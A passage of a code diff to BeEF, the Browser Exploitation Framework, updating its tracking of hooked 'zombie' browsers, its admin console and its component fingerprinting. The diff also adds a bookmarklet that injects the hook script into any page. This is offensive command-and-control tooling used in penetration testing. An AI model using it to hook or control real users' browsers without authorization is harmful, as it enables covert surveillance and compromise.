+            self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasVLC
           has_vlc = get_param(@data['results'], 'HasVLC')
           if BeEF::Filters.is_valid_yes_no?(has_vlc)

core/main/handlers/hookedbrowsers.rb

@@ -51,13 +51,25 @@ module Handlers
 
       # @note is a known browser so send instructions 
       else       
+        # @note Check if we haven't seen this browser for a while, log an event if we haven't
+        if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
+          BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
+        end
+
         # @note record the last poll from the browser
         hooked_browser.lastseen = Time.new.to_i
         
         # @note Check for a change in zombie IP and log an event
-        if hooked_browser.ip != request.ip
-          BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
-          hooked_browser.ip = request.ip
+        if config.get('beef.http.use_x_forward_for') == true
+          if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
+            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
+            hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
+          end
+        else
+          if hooked_browser.ip != request.ip
+           BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
+           hooked_browser.ip = request.ip
+          end
         end
       
         hooked_browser.count!

core/main/handlers/modules/beefjs.rb

@@ -66,6 +66,12 @@ module BeEF
             hook_session_config = BeEF::Core::Server.instance.to_h
 
             # @note if http_host="0.0.0.0" in config ini, use the host requested by client
+            unless hook_session_config['beef_public'].nil?
+              if hook_session_config['beef_host'] != hook_session_config['beef_public']
+                hook_session_config['beef_host'] = hook_session_config['beef_public']
+                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_host']}/, hook_session_config['beef_public'])
+              end
+            end
             if hook_session_config['beef_host'].eql? "0.0.0.0"
               hook_session_config['beef_host'] = req_host
               hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
@@ -74,8 +80,9 @@ module BeEF
             # @note set the XHR-polling timeout
             hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
 
-            # @note set the hook file path
+            # @note set the hook file path and BeEF's cookie name
             hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+            hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
 
             # @note if http_port <> public_port in config ini, use the public_port
             unless hook_session_config['beef_public_port'].nil?

core/main/models/browserdetails.rb

@@ -80,6 +80,7 @@ module Models
       
       return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
       return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
+      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
       return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
       return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
       return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
       return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
       return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
       return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
-      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
     
       BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
     end

core/main/router/router.rb

@@ -81,16 +81,34 @@ module BeEF
             case type
               when "apache"
                 headers "Server" => "Apache/2.2.3 (CentOS)",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
 
               when "iis"
                 headers "Server" => "Microsoft-IIS/6.0",
                         "X-Powered-By" => "ASP.NET",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
               else
                 print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
             end
           end
+
+          # @note If CORS are enabled, expose the appropriate headers
+          # this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
+          # and be able to handle requests with a JSON content-type
+          if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET",
+                    "Access-Control-Allow-Headers" => "Content-Type"
+            halt 200
+          end
+
+          # @note If CORS are enabled, expose the appropriate headers
+          if config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET"
+          end
         end
 
         # @note Default root page

core/main/server.rb

@@ -34,16 +34,18 @@ module BeEF
 
       def to_h
         {
-            'beef_version' => VERSION,
-            'beef_url' => @url,
+            'beef_version'  => VERSION,
+            'beef_url'      => @url,
             'beef_root_dir' => @root_dir,
-            'beef_host' => @configuration.get('beef.http.host'),
-            'beef_port' => @configuration.get('beef.http.port'),
-            'beef_public' => @configuration.get('beef.http.public'),
+            'beef_host'     => @configuration.get('beef.http.host'),
+            'beef_port'     => @configuration.get('beef.http.port'),
+            'beef_public'   => @configuration.get('beef.http.public'),
             'beef_public_port' => @configuration.get('beef.http.public_port'),
-            'beef_dns' => @configuration.get('beef.http.dns'),
-            'beef_hook' => @configuration.get('beef.http.hook_file'),
-            'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http"
+            'beef_dns_host' => @configuration.get('beef.http.dns_host'),
+            'beef_dns_port' => @configuration.get('beef.http.dns_port'),
+            'beef_hook'     => @configuration.get('beef.http.hook_file'),
+            'beef_proto'    => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
+            'client_debug'  => @configuration.get("beef.client.debug")
         }
       end
 

extensions/admin_ui/controllers/logs/logs.rb

@@ -63,7 +63,8 @@ class Logs < BeEF::Extension::AdminUI::HttpController
         'id' => log.id.to_i,
         'date' => log.date.to_s,
         'event' => log.event.to_s,
-        'type' => log.type.to_s
+        'type' => log.type.to_s,
+        'hooked_browser_id' => log.hooked_browser_id.to_i
       }
     end
     

extensions/admin_ui/controllers/modules/modules.rb

@@ -83,7 +83,10 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         ['Browser Components', 'Web Sockets',        'HasWebSocket'],
         ['Browser Components', 'QuickTime',          'HasQuickTime'],
         ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
+        ['Browser Components', 'Windows Media Player','HasWMP'],
         ['Browser Components', 'VLC',                'HasVLC'],
+        ['Browser Components', 'Foxit Reader',       'HasFoxit'],
+        ['Browser Components', 'WebRTC',             'HasWebRTC'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],

extensions/admin_ui/controllers/panel/index.html

@@ -60,6 +60,8 @@
 <body>
 	<%= nonce_tag %>	
 	<div id="header">
+		<div class="left-menu" id="header-right">
+		</div>
 		<div class="right-menu">
 			<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" /> 
 			BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> | 

extensions/admin_ui/controllers/panel/panel.rb

@@ -88,11 +88,14 @@ module BeEF
             has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
             has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
             has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
+            has_webrtc      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
             has_activex     = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
             has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
             has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
             has_realplayer  = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
+            has_wmp         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWMP') 
             has_vlc         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasVLC')
+            has_foxit       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFoxit')
             date_stamp      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
 
             return {
@@ -111,10 +114,13 @@ module BeEF
                 'has_web_sockets' => has_web_sockets,
                 'has_googlegears' => has_googlegears,
                 'has_java'        => has_java,
+                'has_webrtc'      => has_webrtc,
                 'has_activex'     => has_activex,
                 'has_silverlight' => has_silverlight,
                 'has_quicktime'   => has_quicktime,
+                'has_wmp'         => has_wmp,
                 'has_vlc'         => has_vlc,
+                'has_foxit'       => has_foxit,
                 'has_realplayer'  => has_realplayer,
                 'date_stamp'      => date_stamp
             }

extensions/admin_ui/media/css/base.css

@@ -5,13 +5,24 @@
  */
 
 #header .right-menu {
+	width: 300px;
 	float: right;
-	margin: 10px;
+	margin: 3px 3px 0 4px;
 	word-spacing: 5px;
 	font: 11px arial, tahoma, verdana, helvetica;
 	color:#000;
 }
 
+#header .left-menu {
+	width: 300px;
+	float: left;
+	margin: 10px 4px 0 20px;
+	word-spacing: 5px;
+	font: 11px arial, tahoma, verdana, helvetica;
+	font-weight: bolder;
+	color:red;
+}
+
 #header a:link,
 #header a:visited {
 	color:#000;

extensions/admin_ui/media/javascript/ui/panel/DataGrid.js

@@ -18,10 +18,10 @@ DataGrid = function(url, page, base) {
         storeId: 'myStore',
         baseParams: this.base,
         idProperty: 'id',
-        fields: ['id','type','event','date'],
+        fields: ['id','type','event','date','hooked_browser_id'],
         totalProperty: 'count',
         remoteSort: false,
-        sortInfo: {field: "date", direction: "DESC"}
+        sortInfo: {field: "id", direction: "DESC"}
     });
 
     this.bbar = new Ext.PagingToolbar({
@@ -35,16 +35,17 @@ DataGrid = function(url, page, base) {
     this.columns = [{
 			id: 'log-id',
 			header: 'Id',
-			hidden: true,
+			hidden: false,
 			dataIndex: 'id',
-			sortable: false
+			sortable: true,
+			width: 20
 		}, {
 			id: 'log-type',
 			header: "Type",
 			dataIndex: 'type',
 			sortable: true,
 			width: 60,
-			renderer: function(value, metaData, record, rowIndex, colIndex, store) {
+			renderer: function(value) {
 				return "<b>" + $jEncoder.encoder.encodeForHTML(value) + "</b>";
 			}
 		}, {
@@ -53,7 +54,9 @@ DataGrid = function(url, page, base) {
 			dataIndex: 'event',
 			sortable:true,
 			width: 420,
-			renderer: $jEncoder.encoder.encodeForHTML(this.formatTitle)
+			renderer: function(value){
+                return $jEncoder.encoder.encodeForHTML(value);
+            }
 		}, {
 			id: 'log-date',
 			header: "Date",
@@ -61,6 +64,12 @@ DataGrid = function(url, page, base) {
 			width: 80,
 			renderer:  $jEncoder.encoder.encodeForHTML(this.formatDate),
 			sortable:true
+		}, {
+			id: 'log-browser',
+			header: "Browser ID",
+			dataIndex: 'hooked_browser_id',
+			sortable: true,
+			width: 35
     }];
 
     DataGrid.superclass.constructor.call(this, {
@@ -78,7 +87,7 @@ DataGrid = function(url, page, base) {
 		
 		listeners: {
 			afterrender: function(datagrid) {
-				datagrid.store.reload({params:{start:0, limit:datagrid.page, sort:"date", dir:"DESC"}});
+				datagrid.store.reload({params:{start:0, limit:datagrid.page, sort:"id", dir:"DESC"}});
 			}
 		}
     });

extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js

@@ -42,19 +42,39 @@ Ext.onReady(function() {
  * This event updater retrieves updates every 8 seconds. Those updates
  * are then pushed to various managers (i.e. the zombie manager).
  */
+var lastpoll = new Date().getTime();
+
 Ext.TaskMgr.start({
 	run: function() {
 		Ext.Ajax.request({
 			url: '/ui/panel/hooked-browser-tree-update.json',
 			method: 'POST',
 			success: function(response) {
-				var updates = Ext.util.JSON.decode(response.responseText);
+				var updates;
+				try {
+					updates = Ext.util.JSON.decode(response.responseText);
+				} catch (e) {
+					//The framework has probably been reset and you're actually logged out
+					var hr = document.getElementById("header-right");
+					hr.innerHTML = "You appear to be logged out. <a href='/ui/panel/'>Login</a>";
+				}
 				var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
 				var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;
 				
 				if(zombiesManager && hooked_browsers) {
 					zombiesManager.updateZombies(hooked_browsers, distributed_engine_rules);
 				}
+				lastpoll = new Date().getTime();
+				var hr = document.getElementById("header-right");
+				hr.innerHTML = "";
+			},
+			failure: function(response) {
+				var timenow = new Date().getTime();
+
+				if ((timenow - lastpoll) > 60000) {
+					var hr = document.getElementById("header-right");
+					hr.innerHTML = "Framework is down";
+				}
 			}
 		});
 	},

extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js

@@ -6,6 +6,10 @@
 
 WelcomeTab = function() {
 
+    var hookURL = location.protocol+'%2f%2f'+location.hostname+(location.port ? ':'+location.port : '')+'%2fhook.js';
+    var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27__HOOKURL__%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"
+    bookmarklet = bookmarklet.replace(/__HOOKURL__/,hookURL);
+
     welcome = " \
               <div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
               <p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
@@ -13,6 +17,7 @@ WelcomeTab = function() {
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
               <p>Welcome to BeEF!</p><br /> \
               <p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \
+              <p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's bookmark bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
               <p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\
               <p>To interact with a hooked browser simply left-click it, a new tab will appear. \
@@ -46,7 +51,9 @@ WelcomeTab = function() {
               </div>\
               ";
 
-    WelcomeTab.superclass.constructor.call(this, {
+  welcome = welcome.replace(/__BOOKMARKLETURL__/,bookmarklet);
+
+  WelcomeTab.superclass.constructor.call(this, {
 	region:'center',
 	padding:'10 10 10 10',
 	html: welcome,

extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js

@@ -27,8 +27,11 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
 		var has_java           = zombie_array[index]["has_java"];
+		var has_webrtc         = zombie_array[index]["has_webrtc"];
 		var has_activex        = zombie_array[index]["has_activex"];
+		var has_wmp            = zombie_array[index]["has_wmp"]; 
 		var has_vlc            = zombie_array[index]["has_vlc"];
+		var has_foxit          = zombie_array[index]["has_foxit"];
 		var has_silverlight    = zombie_array[index]["has_silverlight"];
 		var has_quicktime      = zombie_array[index]["has_quicktime"];
 		var has_realplayer     = zombie_array[index]["has_realplayer"];
@@ -45,12 +48,15 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Hardware: "       + hw_name;
 		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
 		balloon_text+= "<br/>Flash: "          + has_flash;
-                balloon_text+= "<br/>Java: "           + has_java;
-                balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>Java: "           + has_java;
+		balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>WebRTC: "         + has_webrtc;
 		balloon_text+= "<br/>ActiveX: "        + has_activex;
 		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
 		balloon_text+= "<br/>QuickTime: "      + has_quicktime;
-                balloon_text+= "<br/>VLC: "            + has_vlc;
+		balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; 
+		balloon_text+= "<br/>VLC: "            + has_vlc;
+		balloon_text+= "<br/>Foxit: "          + has_foxit;
 		balloon_text+= "<br/>RealPlayer: "     + has_realplayer;
 		balloon_text+= "<br/>Google Gears: "   + has_googlegears;
 		balloon_text+= "<br/>Date: "           + date_stamp;
@@ -63,7 +69,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 			'balloon_text' : balloon_text,
 			'check'        : false,
 			'domain'       : domain,
-            'port'         : port
+			'port'         : port
 		};
 
 		return new_zombie;

extensions/admin_ui/media/javascript/ui/panel/common.js

@@ -249,12 +249,24 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 							html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
 							html += '<p>';
 							for(index in record.data.data) {
-								result = record.data.data[index];
+								result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/&lt;br&gt;/g,'<br>');
 								index = index.toString().replace('_', ' ');
-                                //output escape everything, but allow the <br> tag for better rendering.
-								html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
+								// Check if the data is the image parameter and that it's a base64 encoded png.
+								if (result.substring(0,28) == "image=data:image/png;base64,") {
+									// Lets display the image
+									try {
+										base64_data = window.atob(result.substring(29,result.length));
+										html += String.format('<img src="{0}" /><br>', result.substring(6));
+									} catch(e) {
+										beef.debug("Received invalid base64 encoded image string: "+e.toString());
+										html += String.format('<b>{0}</b>: {1}<br>', index, result);
+									}
+								} else {
+									// output escape everything, but allow the <br> tag for better rendering.
+									html += String.format('<b>{0}</b>: {1}<br>', index, result);
+								}
 							}
-							
+
 							html += '</p>';
 							return html;
 						}

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js

@@ -33,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) {
                 id = data.id;
             },
             error: function(){
-                console.log("Error getting module id.");
+                beef.debug("Error getting module id.");
             }
         });
         return id;
@@ -110,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) {
                     async: false,
                     processData: false,
                     success: function(data){
-                        console.log("data: " + data.command_id);
+                        beef.debug("data: " + data.command_id);
                         result = "Command [" + data.command_id + "] sent successfully";
                     },
                     error: function(){
-                        console.log("Error sending command");
+                        beef.debug("Error sending command");
                         return "Error sending command";
                     }
                 });
@@ -142,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) {
                         processData: false,
                         success: function(data){
                             $jwterm.each(data, function(i){
-                                console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
+                                beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
                                 results += $jwterm.parseJSON(data[i].data).data;
                             });
 
                         },
                         error: function(){
-                            console.log("Error sending command");
+                            beef.debug("Error sending command");
                             return "Error sending command";
                         }
                     });

extensions/console/lib/command_dispatcher/command.rb

@@ -10,9 +10,18 @@ module CommandDispatcher
   
 class Command
   include BeEF::Extension::Console::CommandDispatcher
+
+  @@params = []
   
   def initialize(driver)
     super
+    begin 
+      driver.interface.cmd['Data'].each{|data|
+        @@params << data['name']
+      }
+    rescue
+      return
+    end
   end
   
   def commands
@@ -41,12 +50,16 @@ class Command
     }
       
     print_line("Module name: " + driver.interface.cmd['Name'])
-    print_line("Module category: " + driver.interface.cmd['Category'])
+    print_line("Module category: " + driver.interface.cmd['Category'].to_s)
     print_line("Module description: " + driver.interface.cmd['Description'])
     print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0
 
     driver.interface.cmd['Data'].each{|data|
-      print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
+      if data['type'].eql?("combobox")
+        print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'] + " (Options include: " + data['store_data'].to_s + ")")
+      else
+        print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
+      end
     } if not driver.interface.cmd['Data'].nil?
   end
   
@@ -80,6 +93,16 @@ class Command
     print_status("Sets parameters for the current modules. Run \"cmdinfo\" to see the parameter values")
     print_status("  Usage: param <paramname> <paramvalue>")
   end
+
+  def cmd_param_tabs(str,words)
+    return if words.length > 1
+
+    if @@params == ""
+      #nothing prepopulated?
+    else
+      return @@params
+    end
+  end
   
   def cmd_execute(*args)
     @@bare_opts.parse(args) {|opt, idx, val|
@@ -119,6 +142,7 @@ class Command
         ])
 
     if args[0] == nil
+      lastcmdid = nil
       driver.interface.getcommandresponses.each do |resp|
         indiresp = driver.interface.getindividualresponse(resp['object_id'])
         respout = ""
@@ -126,6 +150,7 @@ class Command
           respout = "No response yet"
         else
           respout = Time.at(indiresp[0]['date'].to_i).to_s
+          lastcmdid = resp['object_id']
         end
         tbl << [resp['object_id'].to_s, resp['creationdate'], respout]
       end
@@ -133,6 +158,16 @@ class Command
       puts "\n"
       puts "List of responses for this command module:\n"
       puts tbl.to_s + "\n"
+
+      if not lastcmdid.nil?
+        resp = driver.interface.getindividualresponse(lastcmdid)
+        puts "\n"
+        print_line("The last response [" + lastcmdid.to_s + "] was retrieved: " + Time.at(resp[0]['date'].to_i).to_s)
+        print_line("Response:")
+        resp.each do |op|
+          print_line(op['data']['data'].to_s)
+        end
+      end
     else
       output = driver.interface.getindividualresponse(args[0])
       if output.nil?

extensions/console/lib/command_dispatcher/core.rb

@@ -141,13 +141,14 @@ class Core
         [
           'Id',
           'IP',
+          'Hook Host',
           'Browser',
           'OS',
           'Hardware'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
     end
     
     puts "\n"
@@ -174,12 +175,14 @@ class Core
         [
           'Id',
           'IP',
+          'Hook Host',
           'Browser',
-          'OS'
+          'OS',
+          'Hardware'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
     end
     
     puts "\n"
@@ -283,12 +286,21 @@ class Core
       offlinezombies << zombie.id
     end
     
-    if not offlinezombies.include?(args[0].to_i)
-      print_status("Browser does not appear to be offline..")
-      return false
-    end
+    targets = args[0].split(',')
+    targets.each {|t|
+        if not offlinezombies.include?(t.to_i)
+          print_status("Browser [id:"+t.to_s+"] does not appear to be offline.")
+          return false
+        end
+    #print_status("Adding browser [id:"+t.to_s+"] to target list.")
+    }
+
+    # if not offlinezombies.include?(args[0].to_i)
+    #   print_status("Browser does not appear to be offline..")
+    #   return false
+    # end
     
-    if not driver.interface.setofflinetarget(args[0]).nil?
+    if not driver.interface.setofflinetarget(targets).nil?
       if (driver.dispatcher_stack.size > 1 and
 	      driver.current_dispatcher.name != 'Core')
 	      driver.destack_dispatcher
@@ -299,7 +311,7 @@ class Core
       if driver.interface.targetid.length > 1
         driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
       else
-        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ")
+        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ")
       end
     end  
     
@@ -327,7 +339,12 @@ class Core
         driver.run_single("offline")
       when 'commands'
         if driver.dispatched_enstacked(Target)
+          if args[1] == "-s" and not args[2].nil?
+           driver.run_single("commands #{args[1]} #{args[2]}")
+           return
+         else
           driver.run_single("commands")
+        end
         else
           print_error("You aren't targeting a zombie yet")
         end

extensions/console/lib/command_dispatcher/target.rb

@@ -18,7 +18,7 @@ class Target
     begin
       driver.interface.getcommands.each { |folder|
         folder['children'].each { |command|
-          @@commands << folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+          @@commands << folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
         }
       }
     rescue
@@ -40,17 +40,29 @@ class Target
   
   @@bare_opts = Rex::Parser::Arguments.new(
 	  "-h" => [ false, "Help."              ])
+
+  @@commands_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help."],
+    "-s" => [ false, "<search term>"],
+    "-r" => [ false, "List modules which have responses against them only"])
   
   def cmd_commands(*args)
+
+    searchstring = nil
+    responly = nil
     
-    @@bare_opts.parse(args) {|opt, idx, val|
+    @@commands_opts.parse(args) {|opt, idx, val|
       case opt
         when "-h"
           cmd_commands_help
           return false
+        when "-s"
+          searchstring = args[1].downcase if not args[1].nil?
+        when "-r"
+          responly = true
         end
     }
-    
+
     tbl = Rex::Ui::Text::Table.new(
       'Columns' =>
         [
@@ -63,10 +75,29 @@ class Target
     
     driver.interface.getcommands.each { |folder|
       folder['children'].each { |command|
-        tbl << [command['id'].to_i,
-                folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"),
+
+        cmdstring = folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+
+        if not searchstring.nil?
+          if not cmdstring.downcase.index(searchstring).nil?
+            tbl << [command['id'].to_i,
+                cmdstring,
                 command['status'].gsub(/^Verified /,""),
                 driver.interface.getcommandresponses(command['id']).length] #TODO
+          end
+        elsif not responly.nil?
+             tbl << [command['id'].to_i,
+                cmdstring,
+                command['status'].gsub(/^Verified /,""),
+                driver.interface.getcommandresponses(command['id']).length] if driver.interface.getcommandresponses(command['id']).length.to_i > 0
+
+        else 
+         tbl << [command['id'].to_i,
+            cmdstring,
+            command['status'].gsub(/^Verified /,""),
+            driver.interface.getcommandresponses(command['id']).length] #TODO
+        end
+
       }
     }
     
@@ -78,6 +109,9 @@ class Target
   
   def cmd_commands_help(*args)
     print_status("List command modules for this target")
+    print_line("Usage: commands [options]")
+    print_line
+    print @@commands_opts.usage()
   end
   
   def cmd_info(*args)
@@ -133,7 +167,7 @@ class Target
     else
       driver.interface.getcommands.each { |x|
         x['children'].each { |y|
-          if args[0].chomp == x['text']+"/"+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+          if args[0].chomp == x['text'].gsub(/\s/,"_")+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
             modid = y['id']
           end
         }

extensions/console/lib/shellinterface.rb

@@ -299,7 +299,10 @@ class ShellInterface
         ['Browser Components', 'Web Sockets',        'HasWebSocket'],
         ['Browser Components', 'QuickTime',          'HasQuickTime'],
         ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
+        ['Browser Components', 'Windows Media Player','HasWMP'], 
         ['Browser Components', 'VLC',                'HasVLC'],
+        ['Browser Components', 'Foxit',              'HasFoxit'],
+        ['Browser Components', 'WebRTC',             'HasWebRTC'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
@@ -308,7 +311,7 @@ class ShellInterface
         ['Hooked Page', 'Page Title',    'PageTitle'],
         ['Hooked Page', 'Page URI',      'PageURI'],
         ['Hooked Page', 'Page Referrer', 'PageReferrer'],
-        ['Hooked Page', 'Host Name/IP',  'HostName'],
